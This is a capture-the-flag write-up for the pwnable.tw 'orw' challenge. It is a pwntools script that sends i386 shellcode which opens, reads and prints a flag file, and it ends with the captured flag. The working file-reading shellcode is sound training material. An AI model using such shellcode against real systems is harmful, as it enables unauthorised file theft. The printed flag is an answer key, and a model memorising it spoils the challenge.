[pwnable.tw] orw write-up
ba0bab
2018. 8. 19. 00:45
from pwn import *
# Solver for the pwnable.tw "orw" training challenge: the service reads raw
# i386 shellcode and runs it, so the script assembles a file-read stub and
# sends it over the wire.
# NOTE(review): the challenge name suggests the service allow-lists only the
# open/read/write syscalls; that filter is not shown on this page, so confirm.
s = remote("chall.pwnable.tw", 10001)

# asm() below assembles for whatever the global context says, so pin it to
# 32-bit Linux before any shellcraft template is rendered.
context(arch='i386', os='linux')

# Consume the service banner up to the prompt's colon.
s.recvuntil(":")

# Each entry is one shellcraft template rendered to assembly text; the stages
# run back to back in this order.
stages = [
    # Push the NUL-terminated path onto the stack; esp now points at it.
    shellcraft.pushstr("/home/orw/flag"),
    # open(esp, 0, 0): flags 0 is O_RDONLY; the new fd comes back in eax.
    shellcraft.open("esp", 0, 0),
    # read(eax, esp, 0xff): reuse the stack as the buffer, overwriting the path.
    shellcraft.read("eax", "esp", 0xff),
    # write(1, esp, 0xff): always emits 255 bytes to stdout, so anything past
    # the file's contents is leftover stack data, not part of the file.
    shellcraft.write(1, "esp", 0xff),
]
payload = "".join(stages)

# sendline() appends a newline after the assembled bytes.
s.sendline(asm(payload))

# Hand the socket to the terminal to show what the service writes back.
s.interactive()
FLAG{sh3llc0ding_w1th_op3n_r34d_writ3}